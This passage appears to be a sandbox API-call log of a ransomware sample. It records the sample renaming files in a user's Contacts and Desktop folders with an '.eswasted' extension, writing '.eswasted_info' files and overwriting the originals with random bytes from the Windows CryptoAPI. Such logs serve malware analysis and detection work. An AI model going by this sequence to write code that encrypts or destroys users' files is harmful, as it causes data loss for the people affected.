lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.662] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted")) returned 1 [0072.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.664] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.666] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.667] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.667] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.667] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.668] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.668] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.678] SetEndOfFile (hFile=0x11c) returned 1 [0072.681] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.681] CloseHandle (hObject=0x11c) returned 1 [0072.683] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.683] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.684] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.684] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.684] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0072.684] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x717b00 [0072.685] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.685] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.685] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.685] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.685] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.686] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.687] SetEndOfFile (hFile=0x11c) returned 1 [0072.687] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.687] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.687] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted")) returned 1 [0072.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.689] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.702] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.703] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.703] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.703] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.704] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.704] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.712] SetEndOfFile (hFile=0x11c) returned 1 [0072.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.715] CloseHandle (hObject=0x11c) returned 1 [0072.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.761] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.762] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.762] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kFWpD9J0qyqobsTdcd.wav") returned 65 [0072.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x717b00 [0072.762] lstrcpyW (in: lpString1=0x717b82, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.762] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.763] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.763] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kFWpD9J0qyqobsTdcd.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kfwpd9j0qyqobstdcd.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.763] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.764] SetEndOfFile (hFile=0x11c) returned 1 [0072.765] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.765] lstrcpyW (in: lpString1=0x717b82, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kFWpD9J0qyqobsTdcd.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kfwpd9j0qyqobstdcd.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kFWpD9J0qyqobsTdcd.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kfwpd9j0qyqobstdcd.wav.eswasted")) returned 1 [0072.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kFWpD9J0qyqobsTdcd.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kfwpd9j0qyqobstdcd.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.766] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.767] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.767] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.768] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.768] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.768] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.768] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.779] SetEndOfFile (hFile=0x11c) returned 1 [0072.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.782] CloseHandle (hObject=0x11c) returned 1 [0072.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.784] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.785] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.785] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1POeABzlVOMqM-TNqKj.mp4") returned 65 [0072.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x717b00 [0072.785] lstrcpyW (in: lpString1=0x717b82, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.785] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.786] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.786] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1POeABzlVOMqM-TNqKj.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1poeabzlvomqm-tnqkj.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.787] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.788] SetEndOfFile (hFile=0x11c) returned 1 [0072.788] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.789] lstrcpyW (in: lpString1=0x717b82, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1POeABzlVOMqM-TNqKj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1poeabzlvomqm-tnqkj.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1POeABzlVOMqM-TNqKj.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1poeabzlvomqm-tnqkj.mp4.eswasted")) returned 1 [0072.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1POeABzlVOMqM-TNqKj.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1poeabzlvomqm-tnqkj.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.790] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.793] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.833] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.833] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.833] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.834] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.834] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.844] SetEndOfFile (hFile=0x11c) returned 1 [0072.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.848] CloseHandle (hObject=0x11c) returned 1 [0072.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.849] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.850] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.850] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\xXHJMNGsM3NQJ-uKlH.m4a") returned 83 [0072.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b0) returned 0x6f6880 [0072.850] lstrcpyW (in: lpString1=0x6f6926, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.850] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.851] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.851] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\xXHJMNGsM3NQJ-uKlH.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\xxhjmngsm3nqj-uklh.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.852] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.853] SetEndOfFile (hFile=0x11c) returned 1 [0072.853] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.854] lstrcpyW (in: lpString1=0x6f6926, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\xXHJMNGsM3NQJ-uKlH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\xxhjmngsm3nqj-uklh.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\xXHJMNGsM3NQJ-uKlH.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\xxhjmngsm3nqj-uklh.m4a.eswasted")) returned 1 [0072.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\xXHJMNGsM3NQJ-uKlH.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f3ozakbxnysu3qqot\\xxhjmngsm3nqj-uklh.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.854] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0072.857] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.857] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.857] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.857] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.858] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.858] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.866] SetEndOfFile (hFile=0x11c) returned 1 [0072.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.868] CloseHandle (hObject=0x11c) returned 1 [0072.870] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0072.870] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.871] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.871] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8VbFpA.flv") returned 52 [0072.871] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x717b00 [0072.871] lstrcpyW (in: lpString1=0x717b68, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.871] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.871] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.896] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.896] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8VbFpA.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8vbfpa.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.898] WriteFile (in: hFile=0x11c, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.899] SetEndOfFile (hFile=0x11c) returned 1 [0072.900] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.900] lstrcpyW (in: lpString1=0x717b68, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8VbFpA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8vbfpa.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8VbFpA.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8vbfpa.flv.eswasted")) returned 1 [0072.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8VbFpA.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8vbfpa.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.901] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0072.902] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.903] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.903] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.903] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.904] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.904] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.913] SetEndOfFile (hFile=0x11c) returned 1 [0072.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.916] CloseHandle (hObject=0x11c) returned 1 [0072.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.918] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.919] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.919] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.919] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ct8awPWiMCAsR.gif") returned 59 [0072.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x6f5cc0 [0072.919] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.919] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.920] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.920] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ct8awPWiMCAsR.gif.eswasted_info" (normalized: 